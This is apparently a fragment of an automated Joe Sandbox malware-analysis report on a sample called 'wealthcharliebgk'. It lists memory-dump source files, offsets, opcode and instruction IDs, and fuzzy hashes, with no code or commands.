                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875989849.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_a20000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fbd2b601594dcc2250ccace208021e283710a134263dde44b4b52b13cf2b12b4
                                                                                                                                    • Instruction ID: c16c815e76e18127af7ec1bb7139624260ccf2d0ff7351210572a799eae0f24f
                                                                                                                                    • Opcode Fuzzy Hash: fbd2b601594dcc2250ccace208021e283710a134263dde44b4b52b13cf2b12b4
                                                                                                                                    • Instruction Fuzzy Hash: 2BC1B374E00218CFDB14DFA5D984BADBBB2BF89300F6080A9D809AB355DB355E85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875989849.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_a20000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ca98d756448c7dc7e582f1b4edef654d006f6da9288a9561d86a930d2bbc0570
                                                                                                                                    • Instruction ID: 3f9237159b4f08d2fe2c4ec9702e6ebde9d185b30ed4c356ce70adaa0a1db0ef
                                                                                                                                    • Opcode Fuzzy Hash: ca98d756448c7dc7e582f1b4edef654d006f6da9288a9561d86a930d2bbc0570
                                                                                                                                    • Instruction Fuzzy Hash: 33C1A274E00218CFDB14DFA9D994BADBBB2BF89300F6084A9D409AB355DB359E85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875989849.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_a20000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 324bb6d175c3a95d42b192f2feb551770f86d8947bf99f95fb81ab5fa572979d
                                                                                                                                    • Instruction ID: 252d9a0ca00c1fa35e57dd40f751041f72af9fcaf89a07c0e696d4ff04fcd11b
                                                                                                                                    • Opcode Fuzzy Hash: 324bb6d175c3a95d42b192f2feb551770f86d8947bf99f95fb81ab5fa572979d
                                                                                                                                    • Instruction Fuzzy Hash: 9EC1B374E00228CFDB14DFA9D994BADBBB2BF89300F6084A9D409AB355DB355E85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875989849.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_a20000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6cbadf1d5dddf2c0d0d01b2fb2781736d0ca1ee36228552285f1c18feaacb0c7
                                                                                                                                    • Instruction ID: 3a32e57df7f380c087a0265492de9e73acb8e638c0e3eae1d234d7a1d1bdc768
                                                                                                                                    • Opcode Fuzzy Hash: 6cbadf1d5dddf2c0d0d01b2fb2781736d0ca1ee36228552285f1c18feaacb0c7
                                                                                                                                    • Instruction Fuzzy Hash: D2C1A174E00218CFDB14DFA9D994BADBBB2BF89300F6084A9D409AB355DB359E85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875989849.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_a20000_wealthcharliebgk.jbxd
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.876003321.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_a50000_wealthcharliebgk.jbxd
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875522413.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_240000_wealthcharliebgk.jbxd